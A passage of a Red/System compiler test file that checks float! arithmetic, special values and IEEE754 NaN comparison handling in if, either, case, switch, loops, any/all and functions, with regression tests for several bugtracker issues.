[float!]] sf6/i: 1234567890 sf6/f: 3.14159265358979 --assert sf6/i = 1234567890 --assert sf6/f = pi ===end-group=== ===start-group=== "float pointers" --test-- "float-point-1" pi: 3.14159265358979 p: declare pointer! [float!] p/value: 3.14159265358979 --assert pi = p/value ===end-group=== ===start-group=== "expressions with returned float values" fe1: function [ return: [float!] ][ 1.0 ] fe2: function [ return: [float!] ][ 2.0 ] --test-- "ewrfv0" --assertf~= 1.0 (fe1 * 1.0) 0.1E-13 --test-- "ewrfv1" --assertf~= 1.0 (1.0 * fe1) 0.1E-13 --test-- "ewrfv2" --assertf~= 0.5 (fe1 / fe2) 0.1E-13 ===end-group=== ===start-group=== "float arguments to typed functions" fatf1: function [ [typed] count [integer!] list [typed-float!] return: [float!] /local a [float!] ][ a: list/value a ] fatf2: function [ [typed] count [integer!] list [typed-float!] return: [float!] /local a [float!] b [float!] ][ a: list/value list: list + 1 b: list/value a + b ] --test-- "fatf-1" --assert 2.0 = fatf1 2.0 --test-- "fatf-2" --assert 2.0 = fatf1 1.0 + fatf1 1.0 --test-- "fatf-3" --assert 3.0 = fatf2 [1.0 2.0] ===end-group=== ===start-group=== "calculations" fcfoo: func [a [float!] return: [float!]][a] fcptr: declare struct! [a [float!]] fcptr/a: 3.0 fc2: 3.0 --test-- "fc-1" fc1: 2.0 fc1: fc1 / (fc1 - 1.0) --assertf~= 2.0 fc1 0.1E-13 --test-- "fc-2" --assert 5.0 - 3.0 = 2.0 ;-- imm/imm --test-- "fc-3" --assert 5.0 - fc2 = 2.0 ;-- imm/ref --test-- "fc-4" --assert 5.0 - (fcfoo 3.0) = 2.0 ;-- imm/reg(block!) --test-- "fc-5" --assertf~= 5.0 - fcptr/a 2.0 1E-10 ;-- imm/reg(path!) --test-- "fc-6" --assert fc2 - 5.0 = -2.0 ;-- ref/imm --test-- "fc-7" --assert fc2 - (fcfoo 5.0) = -2.0 ;-- ref/reg(block!) --test-- "fc-8" --assert fc2 - fcptr/a = 0.0 ;-- ref/reg(path!) --test-- "fc-9" --assertf~= (fcfoo 5.0) - 3.0 2.0 1E-10 ;-- reg(block!)/imm --test-- "fc-10" --assert (fcfoo 5.0) - (fcfoo 3.0) = 2.0 ;-- reg(block!)/reg(block!) --test-- "fc-11" --assert (fcfoo 5.0) - fcptr/a = 2.0 ;-- reg(block!)/reg(path!) --test-- "fc-12" --assert fcptr/a - (fcfoo 5.0) = -2.0 ;-- reg(path!)/reg(block!) --test-- "#4038" RECT_F4038: alias struct! [ left [float!] top [float!] right [float!] bottom [float!] ] test4038: func [/local rc [RECT_F4038 value]][ rc/right: 0.0 --assert rc/right = 0.0 rc/right: rc/right + as float! (1 + 2) --assert rc/right = 3.0 ] test4038 ===end-group=== ===start-group=== "Float special values" --test-- "fsp-1" fp-1: 1.#NAN --assert fp-1 <> fp-1 fp-1: 1.#INF --assert fp-1 = 1.#INF fp-1: +1.#INF --assert fp-1 = 1.#INF fp-1: -1.#INF --assert fp-1 = -1.#INF --test-- "fsp-2" fp-2: -0.0 --assert fp-2 = -0.0 --assert 1.0 + -0.0 = 1.0 --assert -1.0 * 0.0 = -0.0 --test-- "fsp-3" fsp-3: func [f [float!] return: [float!]][f] --assert -0.0 = fsp-3 -0.0 ===end-group=== ===start-group=== "IEEE754 compliance in NaN handling - float! type" ;-- vars list: ; nan +inf -inf zero one two five ; failed b i f g ; any1-fail all1-fail f-yes f-not fi-yes fi-not ; cmp= cmp< cmp> icmp= icmp< icmp> ecmp= ecmp< ecmp> nan: 0.0 / 0.0 +inf: 1.0 / 0.0 -inf: -1.0 / 0.0 zero: 0.0 one: 1.0 two: 2.0 five: 5.0 ;; check point 1 - assertions -- only in manual test files `nan-tests-manual*.reds` ;; check point 2 - if's --test-- "if nan 1" failed: no if nan = nan [failed: yes] --assert not failed --test-- "if nan 2" failed: no if nan = one [failed: yes] --assert not failed --test-- "if nan 3" failed: no if nan < nan [failed: yes] --assert not failed --test-- "if nan 4" failed: no if nan < one [failed: yes] --assert not failed --test-- "if nan 5" failed: no if one < nan [failed: yes] --assert not failed --test-- "if nan 6" failed: no if two < one [failed: yes] --assert not failed --test-- "if nan 7" failed: no if one < nan [failed: yes] --assert not failed --test-- "if nan 8" failed: yes if one = one [failed: no] --assert not failed --test-- "if nan 9" failed: yes if one < two [failed: no] --assert not failed --test-- "if nan 10" failed: yes if nan <> nan [failed: no] --assert not failed --test-- "if nan 11" failed: no if not (one = one) [failed: yes] --assert not failed --test-- "if nan 12" failed: no if not (one <> nan) [failed: yes] --assert not failed --test-- "if nan 13" failed: no if not (nan <> nan) [failed: yes] --assert not failed ;; ... unless's --test-- "unless nan 1" failed: no unless one = one [failed: yes] --assert not failed --test-- "unless nan 2" failed: no unless one <> nan [failed: yes] --assert not failed --test-- "unless nan 3" failed: no unless nan <> nan [failed: yes] --assert not failed ;; check point 3 - either's --test-- "either nan 1" failed: yes either one = one [failed: no][1] --assert not failed --test-- "either nan 2" failed: yes either one < two [failed: no][1] --assert not failed --test-- "either nan 3" failed: yes either two > one [failed: no][1] --assert not failed --test-- "either nan 4" failed: yes either nan = nan [1][failed: no] --assert not failed --test-- "either nan 5" failed: yes either nan = one [1][failed: no] --assert not failed --test-- "either nan 6" failed: yes either one = nan [1][failed: no] --assert not failed --test-- "either nan 7" failed: yes either one < one [1][failed: no] --assert not failed --test-- "either nan 8" failed: yes either one < nan [1][failed: no] --assert not failed --test-- "either nan 9" failed: yes either nan < one [1][failed: no] --assert not failed --test-- "either nan 10" failed: yes either one > one [1][failed: no] --assert not failed --test-- "either nan 11" failed: yes either one > nan [1][failed: no] --assert not failed --test-- "either nan 12" failed: yes either nan > one [1][failed: no] --assert not failed --test-- "either nan 13" failed: yes either one <> one [1][failed: no] --assert not failed --test-- "either nan 14" failed: yes either nan <> nan [failed: no][1] --assert not failed --test-- "either nan 15" failed: yes either one <> nan [failed: no][1] --assert not failed --test-- "either nan 16" failed: yes either nan <> one [failed: no][1] --assert not failed --test-- "either nan 17" failed: yes either one <> two [failed: no][1] --assert not failed ;; check point 4 - case's --test-- "case nan 1" failed: yes case [one = one [failed: no] true [1]] --assert not failed --test-- "case nan 2" failed: yes case [one < two [failed: no] true [1]] --assert not failed --test-- "case nan 3" failed: yes case [two > one [failed: no] true [1]] --assert not failed --test-- "case nan 4" failed: yes case [nan = nan [1] true [failed: no]] --assert not failed --test-- "case nan 5" failed: yes case [nan = one [1] true [failed: no]] --assert not failed --test-- "case nan 6" failed: yes case [one = nan [1] true [failed: no]] --assert not failed --test-- "case nan 7" failed: yes case [one < one [1] true [failed: no]] --assert not failed --test-- "case nan 8" failed: yes case [one < nan [1] true [failed: no]] --assert not failed --test-- "case nan 9" failed: yes case [nan < one [1] true [failed: no]] --assert not failed --test-- "case nan 10" failed: yes case [one > one [1] true [failed: no]] --assert not failed --test-- "case nan 11" failed: yes case [one > nan [1] true [failed: no]] --assert not failed --test-- "case nan 12" failed: yes case [nan > one [1] true [failed: no]] --assert not failed --test-- "case nan 13" failed: yes case [one <> one [1] true [failed: no]] --assert not failed --test-- "case nan 14" failed: yes case [nan <> nan [failed: no] true [1]] --assert not failed --test-- "case nan 15" failed: yes case [one <> nan [failed: no] true [1]] --assert not failed --test-- "case nan 16" failed: yes case [nan <> one [failed: no] true [1]] --assert not failed --test-- "case nan 17" failed: yes case [one <> two [failed: no] true [1]] --assert not failed --test-- "case nan 18" failed: yes case [ nan = nan [1] nan > one [1] one > nan [1] one = one [failed: no] ] --assert not failed ;; check point 5 - until's end-condition --test-- "until nan 1" i: 0 f: five g: zero until [ i: i + 1 f: f - 1.0 g: zero / f g <> zero ] --assert i = 5 --test-- "until nan 2" i: 0 f: five until [ i: i + 1 f: f - 1.0 zero / f <> zero ] --assert i = 5 --test-- "until nan 3" i: 0 f: five until [ i: i + 1 f: f - 1.0 not (zero / f <= +inf) ] --assert i = 5 --test-- "until nan 4" i: 0 f: five until [ i: i + 1 f: f - 1.0 not (f * +inf <= +inf) ] --assert i = 5 ;; check point 6 - while's enter-condition --test-- "while nan 1" i: 0 f: five g: zero while [g = zero] [i: i + 1 f: f - 1.0 g: zero / f] --assert i = 5 --test-- "while nan 2" i: 0 f: five g: zero while [g <= +inf] [i: i + 1 f: f - 1.0 g: zero / f] --assert i = 5 --test-- "while nan 3" i: 0 f: five g: zero while [g >= -inf] [i: i + 1 f: f - 1.0 g: zero / f] --assert i = 5 --test-- "while nan 4" i: 0 f: five g: zero while [-inf <= g] [i: i + 1 f: f - 1.0 g: zero / f] --assert i = 5 --test-- "while nan 5" i: 0 f: five g: zero while [+inf >= g] [i: i + 1 f: f - 1.0 g: zero / f] --assert i = 5 ;; check point 7 - all's --test-- "all nan 1" failed: no all1-fail: func [][failed: yes] all [zero = zero zero < one one < two one <> nan nan <> nan nan = nan all1-fail] --assert not failed --test-- "all nan 2" failed: no if all [zero = zero zero < one one < two one <> nan nan <> nan nan = nan][failed: yes] --assert not failed --test-- "all nan 3" failed: no unless all [zero = zero zero < one one < two one <> nan nan <> nan] [failed: yes] --assert not failed --test-- "all nan 4" failed: yes either all [one = one] [failed: no][1] --assert not failed --test-- "all nan 5" failed: yes either all [one < two] [failed: no][1] --assert not failed --test-- "all nan 6" failed: yes either all [two > one] [failed: no][1] --assert not failed --test-- "all nan 7" failed: yes either all [nan = nan] [1][failed: no] --assert not failed --test-- "all nan 8" failed: yes either all [nan = one] [1][failed: no] --assert not failed --test-- "all nan 9" failed: yes either all [one = nan] [1][failed: no] --assert not failed --test-- "all nan 10" failed: yes either all [one < one] [1][failed: no] --assert not failed --test-- "all nan 11" failed: yes either all [one < nan] [1][failed: no] --assert not failed --test-- "all nan 12" failed: yes either all [nan < one] [1][failed: no] --assert not failed --test-- "all nan 13" failed: yes either all [one > one] [1][failed: no] --assert not failed --test-- "all nan 14" failed: yes either all [one > nan] [1][failed: no] --assert not failed --test-- "all nan 15" failed: yes either all [nan > one] [1][failed: no] --assert not failed --test-- "all nan 16" failed: yes either all [one <> one] [1][failed: no] --assert not failed --test-- "all nan 17" failed: yes either all [nan <> nan] [failed: no][1] --assert not failed --test-- "all nan 18" failed: yes either all [one <> nan] [failed: no][1] --assert not failed --test-- "all nan 19" failed: yes either all [nan <> one] [failed: no][1] --assert not failed --test-- "all nan 20" failed: yes either all [one <> two] [failed: no][1] --assert not failed --test-- "all nan 21" failed: yes b: all [nan = nan] unless b [failed: no] --assert not failed --test-- "all nan 22" failed: yes b: all [one < nan] unless b [failed: no] --assert not failed --test-- "all nan 23" failed: yes b: all [one > nan] unless b [failed: no] --assert not failed --test-- "all nan 24" failed: yes b: all [one = one] if b [failed: no] --assert not failed ;; ... any's --test-- "any nan 1" failed: no any1-fail: func [][failed: yes] any [zero <> zero zero > one one > two one = nan nan = nan nan <> nan any1-fail] --assert not failed --test-- "any nan 2" failed: no unless any [zero <> zero zero > one one > two one = nan nan = nan nan <> nan][ failed: yes ] --assert not failed --test-- "any nan 3" failed: no either any [zero <> zero zero > one one > two one = nan nan = nan] [failed: yes] [1] --assert not failed --test-- "any nan 4" failed: yes either any [one = one] [failed: no][1] --assert not failed --test-- "any nan 5" failed: yes either any [one < two] [failed: no][1] --assert not failed --test-- "any nan 6" failed: yes either any [two > one] [failed: no][1] --assert not failed --test-- "any nan 7" failed: yes either any [nan = nan] [1][failed: no] --assert not failed --test-- "any nan 8" failed: yes either any [nan = one] [1][failed: no] --assert not failed --test-- "any nan 9" failed: yes either any [one = nan] [1][failed: no] --assert not failed --test-- "any nan 10" failed: yes either any [one < one] [1][failed: no] --assert not failed --test-- "any nan 11" failed: yes either any [one < nan] [1][failed: no] --assert not failed --test-- "any nan 12" failed: yes either any [nan < one] [1][failed: no] --assert not failed --test-- "any nan 13" failed: yes either any [one > one] [1][failed: no] --assert not failed --test-- "any nan 14" failed: yes either any [one > nan] [1][failed: no] --assert not failed --test-- "any nan 15" failed: yes either any [nan > one] [1][failed: no] --assert not failed --test-- "any nan 16" failed: yes either any [one <> one] [1][failed: no] --assert not failed --test-- "any nan 17" failed: yes either any [nan <> nan] [failed: no][1] --assert not failed --test-- "any nan 18" failed: yes either any [one <> nan] [failed: no][1] --assert not failed --test-- "any nan 19" failed: yes either any [nan <> one] [failed: no][1] --assert not failed --test-- "any nan 20" failed: yes either any [one <> two] [failed: no][1] --assert not failed --test-- "any nan 21" failed: yes b: any [nan = nan] unless b [failed: no] --assert not failed --test-- "any nan 22" failed: yes b: any [one < nan] unless b [failed: no] --assert not failed --test-- "any nan 23" failed: yes b: any [one > nan] unless b [failed: no] --assert not failed --test-- "any nan 24" failed: yes b: any [one = one] if b [failed: no] --assert not failed --test-- "any nan 25" failed: yes b: any [nan = nan one = one] if b [failed: no] --assert not failed ;; check point 8 - functions with logic arguments from nan comparison f-yes: func [cond [logic!] msg [c-string!]] [ if cond [failed: no]] f-not: func [cond [logic!] msg [c-string!]] [unless cond [failed: no]] --test-- "func nan 1" failed: yes f-yes nan <> nan "nan <> nan" --assert not failed --test-- "func nan 2" failed: yes f-yes one <> nan "one <> nan" --assert not failed --test-- "func nan 3" failed: yes f-yes not (nan = nan) "not nan = nan" --assert not failed --test-- "func nan 4" failed: yes f-yes not (one = nan) "not one = nan" --assert not failed --test-- "func nan 5" failed: yes f-not nan = nan "nan = nan" --assert not failed --test-- "func nan 6" failed: yes f-not nan = one "nan = one" --assert not failed --test-- "func nan 7" failed: yes f-not one = nan "one = nan" --assert not failed --test-- "func nan 8" failed: yes f-not nan < one "nan < one" --assert not failed --test-- "func nan 9" failed: yes f-not one < nan "one < nan" --assert not failed --test-- "func nan 10" failed: yes f-not nan > one "nan > one" --assert not failed --test-- "func nan 11" failed: yes f-not one > nan "one > nan" --assert not failed ;; ... functions with integer arguments from nan comparison fi-yes: func [i [integer!] msg [c-string!]] [if i = 1 [failed: no]] fi-not: func [i [integer!] msg [c-string!]] [if i = 0 [failed: no]] --test-- "func nan 12" failed: yes fi-yes as-integer nan <> nan "nan <> nan" --assert not failed --test-- "func nan 13" failed: yes fi-yes as-integer one <> nan "one <> nan" --assert not failed --test-- "func nan 14" failed: yes fi-yes as-integer not (nan = nan) "not nan = nan" --assert not failed --test-- "func nan 15" failed: yes fi-yes as-integer not (one = nan) "not one = nan" --assert not failed --test-- "func nan 16" failed: yes fi-not as-integer nan = nan "nan = nan" --assert not failed --test-- "func nan 17" failed: yes fi-not as-integer nan = one "nan = one" --assert not failed --test-- "func nan 18" failed: yes fi-not as-integer one = nan "one = nan" --assert not failed --test-- "func nan 19" failed: yes fi-not as-integer nan < one "nan < one" --assert not failed --test-- "func nan 20" failed: yes fi-not as-integer one < nan "one < nan" --assert not failed --test-- "func nan 21" failed: yes fi-not as-integer nan > one "nan > one" --assert not failed --test-- "func nan 22" failed: yes fi-not as-integer one > nan "one > nan" --assert not failed ;; check point 9 - logic return values from nan comparison cmp=: func [a [float!] b [float!] return: [logic!]] [a = b] cmp<: func [a [float!] b [float!] return: [logic!]] [a < b] cmp>: func [a [float!] b [float!] return: [logic!]] [a > b] --test-- "func nan 23" failed: yes unless cmp= nan nan [failed: no] --assert not failed --test-- "func nan 24" failed: yes unless cmp= one nan [failed: no] --assert not failed --test-- "func nan 25" failed: yes unless cmp< one nan [failed: no] --assert not failed --test-- "func nan 26" failed: yes unless cmp< nan one [failed: no] --assert not failed --test-- "func nan 27" failed: yes unless cmp> one nan [failed: no] --assert not failed --test-- "func nan 28" failed: yes unless cmp> nan one [failed: no] --assert not failed --test-- "func nan 29" failed: yes if cmp= one one [failed: no] --assert not failed --test-- "func nan 30" failed: yes if cmp< one two [failed: no] --assert not failed --test-- "func nan 31" failed: yes if cmp> two one [failed: no] --assert not failed ;; ... integer return values from nan comparison icmp=: func [a [float!] b [float!] return: [integer!]] [as integer! a = b] icmp<: func [a [float!] b [float!] return: [integer!]] [as integer! a < b] icmp>: func [a [float!] b [float!] return: [integer!]] [as integer! a > b] --test-- "func nan 32" failed: yes unless 0 <> icmp= nan nan [failed: no] --assert not failed --test-- "func nan 33" failed: yes unless 0 <> icmp= one nan [failed: no] --assert not failed --test-- "func nan 34" failed: yes unless 0 <> icmp< one nan [failed: no] --assert not failed --test-- "func nan 35" failed: yes unless 0 <> icmp< nan one [failed: no] --assert not failed --test-- "func nan 36" failed: yes unless 0 <> icmp> one nan [failed: no] --assert not failed --test-- "func nan 37" failed: yes unless 0 <> icmp> nan one [failed: no] --assert not failed --test-- "func nan 38" failed: yes unless 1 <> icmp= one one [failed: no] --assert not failed --test-- "func nan 39" failed: yes unless 1 <> icmp< one two [failed: no] --assert not failed --test-- "func nan 40" failed: yes unless 1 <> icmp> two one [failed: no] --assert not failed ;; check point 10 - assignment to logic/integer variables --test-- "assign nan 1" failed: yes b: nan = nan unless b [failed: no] --assert not failed --test-- "assign nan 2" failed: yes b: one < nan unless b [failed: no] --assert not failed --test-- "assign nan 3" failed: yes b: one > nan unless b [failed: no] --assert not failed --test-- "assign nan 4" failed: yes b: nan < one unless b [failed: no] --assert not failed --test-- "assign nan 5" failed: yes b: nan > one unless b [failed: no] --assert not failed --test-- "assign nan 6" failed: yes b: one = one if b [failed: no] --assert not failed --test-- "assign nan 7" failed: yes b: nan <> nan if b [failed: no] --assert not failed --test-- "assign nan 8" failed: yes i: as integer! nan = nan if i = 0 [failed: no] --assert not failed --test-- "assign nan 9" failed: yes i: as integer! one < nan if i = 0 [failed: no] --assert not failed --test-- "assign nan 10" failed: yes i: as integer! one > nan if i = 0 [failed: no] --assert not failed --test-- "assign nan 11" failed: yes i: as integer! nan < one if i = 0 [failed: no] --assert not failed --test-- "assign nan 12" failed: yes i: as integer! nan > one if i = 0 [failed: no] --assert not failed --test-- "assign nan 13" failed: yes i: as integer! one = one if i <> 0 [failed: no] --assert not failed --test-- "assign nan 14" failed: yes i: as integer! nan <> nan if i <> 0 [failed: no] --assert not failed --test-- "assign nan 15" failed: yes i: as integer! (nan = nan) if i = 0 [failed: no] --assert not failed --test-- "assign nan 16" failed: yes i: as integer! (one < nan) if i = 0 [failed: no] --assert not failed --test-- "assign nan 17" failed: yes i: as integer! (one > nan) if i = 0 [failed: no] --assert not failed --test-- "assign nan 18" failed: yes i: as integer! (nan < one) if i = 0 [failed: no] --assert not failed --test-- "assign nan 19" failed: yes i: as integer! (nan > one) if i = 0 [failed: no] --assert not failed --test-- "assign nan 10" failed: yes i: as integer! (one = one) if i <> 0 [failed: no] --assert not failed --test-- "assign nan 20" failed: yes i: as integer! (nan <> nan) if i <> 0 [failed: no] --assert not failed ;; check point 11 - case & switch logic return values from nan comparison --test-- "case return nan 1" failed: yes b: case [true [one <> one]] unless b [failed: no] --assert not failed --test-- "case return nan 2" failed: yes b: case [true [one <> two]] if b [failed: no] --assert not failed --test-- "case return nan 3" failed: yes b: case [true [nan <> nan]] if b [failed: no] --assert not failed --test-- "case return nan 4" failed: yes b: case [true [one <> nan]] if b [failed: no] --assert not failed --test-- "case return nan 5" failed: yes b: case [true [nan <> one]] if b [failed: no] --assert not failed --test-- "case return nan 6" failed: yes b: case [true [one = one]] if b [failed: no] --assert not failed --test-- "case return nan 7" failed: yes b: case [true [one = two]] unless b [failed: no] --assert not failed --test-- "case return nan 8" failed: yes b: case [true [nan = nan]] unless b [failed: no] --assert not failed --test-- "case return nan 9" failed: yes b: case [true [one = nan]] unless b [failed: no] --assert not failed --test-- "case return nan 10" failed: yes b: case [true [nan = one]] unless b [failed: no] --assert not failed --test-- "case return nan 11" failed: yes b: case [true [one < one]] unless b [failed: no] --assert not failed --test-- "case return nan 12" failed: yes b: case [true [one < two]] if b [failed: no] --assert not failed --test-- "case return nan 13" failed: yes b: case [true [nan < nan]] unless b [failed: no] --assert not failed --test-- "case return nan 14" failed: yes b: case [true [one < nan]] unless b [failed: no] --assert not failed --test-- "case return nan 15" failed: yes b: case [true [nan < one]] unless b [failed: no] --assert not failed --test-- "case return nan 16" failed: yes b: case [true [one > one]] unless b [failed: no] --assert not failed --test-- "case return nan 17" failed: yes b: case [true [one > two]] unless b [failed: no] --assert not failed --test-- "case return nan 18" failed: yes b: case [true [nan > nan]] unless b [failed: no] --assert not failed --test-- "case return nan 19" failed: yes b: case [true [one > nan]] unless b [failed: no] --assert not failed --test-- "case return nan 20" failed: yes b: case [true [nan > one]] unless b [failed: no] --assert not failed --test-- "case return nan 21" failed: yes b: case [true [one <= one]] if b [failed: no] --assert not failed --test-- "case return nan 22" failed: yes b: case [true [one <= two]] if b [failed: no] --assert not failed --test-- "case return nan 23" failed: yes b: case [true [nan <= nan]] unless b [failed: no] --assert not failed --test-- "case return nan 24" failed: yes b: case [true [one <= nan]] unless b [failed: no] --assert not failed --test-- "case return nan 25" failed: yes b: case [true [nan <= one]] unless b [failed: no] --assert not failed --test-- "case return nan 26" failed: yes b: case [true [one >= one]] if b [failed: no] --assert not failed --test-- "case return nan 27" failed: yes b: case [true [one >= two]] unless b [failed: no] --assert not failed --test-- "case return nan 28" failed: yes b: case [true [nan >= nan]] unless b [failed: no] --assert not failed --test-- "case return nan 29" failed: yes b: case [true [one >= nan]] unless b [failed: no] --assert not failed --test-- "case return nan 30" failed: yes b: case [true [nan >= one]] unless b [failed: no] --assert not failed --test-- "switch return nan 1" failed: yes b: switch 1 [1 [one <> one]] unless b [failed: no] --assert not failed --test-- "switch return nan 2" failed: yes b: switch 1 [1 [one <> two]] if b [failed: no] --assert not failed --test-- "switch return nan 3" failed: yes b: switch 1 [1 [nan <> nan]] if b [failed: no] --assert not failed --test-- "switch return nan 4" failed: yes b: switch 1 [1 [one <> nan]] if b [failed: no] --assert not failed --test-- "switch return nan 5" failed: yes b: switch 1 [1 [nan <> one]] if b [failed: no] --assert not failed --test-- "switch return nan 6" failed: yes b: switch 1 [1 [one = one]] if b [failed: no] --assert not failed --test-- "switch return nan 7" failed: yes b: switch 1 [1 [one = two]] unless b [failed: no] --assert not failed --test-- "switch return nan 8" failed: yes b: switch 1 [1 [nan = nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 9" failed: yes b: switch 1 [1 [one = nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 10" failed: yes b: switch 1 [1 [nan = one]] unless b [failed: no] --assert not failed --test-- "switch return nan 11" failed: yes b: switch 1 [1 [one < one]] unless b [failed: no] --assert not failed --test-- "switch return nan 12" failed: yes b: switch 1 [1 [one < two]] if b [failed: no] --assert not failed --test-- "switch return nan 13" failed: yes b: switch 1 [1 [nan < nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 14" failed: yes b: switch 1 [1 [one < nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 15" failed: yes b: switch 1 [1 [nan < one]] unless b [failed: no] --assert not failed --test-- "switch return nan 16" failed: yes b: switch 1 [1 [one > one]] unless b [failed: no] --assert not failed --test-- "switch return nan 17" failed: yes b: switch 1 [1 [one > two]] unless b [failed: no] --assert not failed --test-- "switch return nan 18" failed: yes b: switch 1 [1 [nan > nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 19" failed: yes b: switch 1 [1 [one > nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 20" failed: yes b: switch 1 [1 [nan > one]] unless b [failed: no] --assert not failed --test-- "switch return nan 21" failed: yes b: switch 1 [1 [one <= one]] if b [failed: no] --assert not failed --test-- "switch return nan 22" failed: yes b: switch 1 [1 [one <= two]] if b [failed: no] --assert not failed --test-- "switch return nan 23" failed: yes b: switch 1 [1 [nan <= nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 24" failed: yes b: switch 1 [1 [one <= nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 25" failed: yes b: switch 1 [1 [nan <= one]] unless b [failed: no] --assert not failed --test-- "switch return nan 26" failed: yes b: switch 1 [1 [one >= one]] if b [failed: no] --assert not failed --test-- "switch return nan 27" failed: yes b: switch 1 [1 [one >= two]] unless b [failed: no] --assert not failed --test-- "switch return nan 28" failed: yes b: switch 1 [1 [nan >= nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 29" failed: yes b: switch 1 [1 [one >= nan]] unless b [failed: no] --assert not failed --test-- "switch return nan 30" failed: yes b: switch 1 [1 [nan >= one]] unless b [failed: no] --assert not failed ;; check point 12 - inlined nans in any/all --test-- "inlined nan 1" failed: yes unless all [zero / zero <= +inf] [failed: no] --assert not failed --test-- "inlined nan 2" failed: yes unless all [true zero / zero <= +inf] [failed: no] --assert not failed --test-- "inlined nan 3" failed: yes unless all [zero / zero <= +inf true] [failed: no] --assert not failed --test-- "inlined nan 4" failed: yes unless any [zero / zero <= +inf] [failed: no] --assert not failed --test-- "inlined nan 5" failed: yes unless any [zero / zero <= +inf 1 = 2] [failed: no] --assert not failed --test-- "inlined nan 6" failed: yes if any [true zero / zero <= +inf] [failed: no] --assert not failed --test-- "inlined nan 7" failed: yes if any [zero / zero <= +inf true] [failed: no] --assert not failed ;; check point 13 - funcs ending in either returning logic, passed out of the func ecmp=: func [c [logic!] a [float!] b [float!] return: [logic!]] [either c [a = b][a <> b]] ecmp<: func [c [logic!] a [float!] b [float!] return: [logic!]] [either c [a < b][a >= b]] ecmp>: func [c [logic!] a [float!] b [float!] return: [logic!]] [either c [a > b][a <= b]] --test-- "return either logic nan 1" failed: yes unless ecmp= yes nan nan [failed: no] --assert not failed --test-- "return either logic nan 2" failed: yes if ecmp= no nan nan [failed: no] --assert not failed --test-- "return either logic nan 3" failed: yes unless ecmp= yes one nan [failed: no] --assert not failed --test-- "return either logic nan 4" failed: yes if ecmp= no one nan [failed: no] --assert not failed --test-- "return either logic nan 5" failed: yes unless ecmp< yes two one [failed: no] --assert not failed --test-- "return either logic nan 6" failed: yes unless ecmp< no one two [failed: no] --assert not failed --test-- "return either logic nan 7" failed: yes unless ecmp< yes one nan [failed: no] --assert not failed --test-- "return either logic nan 8" failed: yes unless ecmp< no one nan [failed: no] --assert not failed --test-- "return either logic nan 9" failed: yes unless ecmp< yes nan one [failed: no] --assert not failed --test-- "return either logic nan 10" failed: yes unless ecmp< no nan one [failed: no] --assert not failed --test-- "return either logic nan 11" failed: yes unless ecmp> yes one nan [failed: no] --assert not failed --test-- "return either logic nan 12" failed: yes unless ecmp> no one nan [failed: no] --assert not failed --test-- "return either logic nan 13" failed: yes unless ecmp> yes nan one [failed: no] --assert not failed --test-- "return either logic nan 14" failed: yes unless ecmp> no nan one [failed: no] --assert not failed ===end-group=== ===start-group=== "various regression tests from bugtracker" --test-- "issue #847" inf: 1e308 + 1e308 nan: 0.0 * inf --assert not (inf > nan) --assert not (inf < nan) --assert inf <> nan --assert not (inf = nan) --assert not (1.0 < nan) --assert not (nan > 1.0) --assert not (1.0 > nan) --assert not (nan < 1.0) --test-- "issue #227" t: 2.2 ss: declare struct! [v [float!]] ss/v: 2.0 --assertf~= t - ss/v 0.2 1E-10 --test-- "issue #226" number: 10 array: declare pointer! [byte!] array: as byte-ptr! :number value: as integer! array/value --assert (10 * as integer! array/value) = 100 --test-- "issue #225" j: 1.0 f: 1.0 data: declare pointer! [float!] data: :f while [j < 10.0][ data/value: j j j: j + 1.0 ] --assertf~= j 10.0 1E-10 --test-- "issue #223" a: as pointer! [float!] allocate 10 * size? float! i: 1 f: 1.0 while [i <= 10][ f: f * 0.8 ;print [f lf] a/i: f i: i + 1 ] --assert i = 11 --test-- "issue #222" s: declare struct! [value [float!]] s/value: 1.0 a: as pointer! [float!] allocate 100 * size? float! a/1: s/value ; value must be in struct! a/1: s/value ; must be done twice 1.0 + 1.0 ; must be followed by an expression if true [a/1: s/value] --assertf~= a/1 1.0 1E-10 --test-- "issue #221" x: -1.0 y: either x < 0.0 [0.0 - x][x] --assert y = 1.0 _fabs: func [x [float!] return: [float!] ][ either x < 0.0 [0.0 - x][x] ] --assert 3.14 = _fabs -3.14 ===end-group=== ===start-group=== "Arithmetic & Comparison" --test-- "float-auto-1" --assertf~= 0.0 ( 0.0 + 0.0 ) 1E-4 --test-- "float-auto-2" fat-i: 0.0 fat-j: 0.0 fat-k: fat-i + fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-3" --assertf~= -2147483648.0 ( 0.0 + -2147483648.0 ) 1E-4 --test-- "float-auto-4" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i + fat-j --assertf~= -2147483648.0 fat-k 1E-4 --test-- "float-auto-5" --assertf~= 2147483647.0 ( 0.0 + 2147483647.0 ) 1E-4 --test-- "float-auto-6" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i + fat-j --assertf~= 2147483647.0 fat-k 1E-4 --test-- "float-auto-7" --assertf~= -1.0 ( 0.0 + -1.0 ) 1E-4 --test-- "float-auto-8" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i + fat-j --assertf~= -1.0 fat-k 1E-4 --test-- "float-auto-9" --assertf~= 3.0 ( 0.0 + 3.0 ) 1E-4 --test-- "float-auto-10" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i + fat-j --assertf~= 3.0 fat-k 1E-4 --test-- "float-auto-11" --assertf~= -7.0 ( 0.0 + -7.0 ) 1E-4 --test-- "float-auto-12" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i + fat-j --assertf~= -7.0 fat-k 1E-4 --test-- "float-auto-13" --assertf~= 5.0 ( 0.0 + 5.0 ) 1E-4 --test-- "float-auto-14" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i + fat-j --assertf~= 5.0 fat-k 1E-4 --test-- "float-auto-15" --assertf~= 123456.789 ( 0.0 + 123456.789 ) 1E-4 --test-- "float-auto-16" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i + fat-j --assertf~= 123456.789 fat-k 1E-4 --test-- "float-auto-17" --assertf~= 1.222090944E+33 ( 0.0 + 1.222090944E+33 ) 1E-4 --test-- 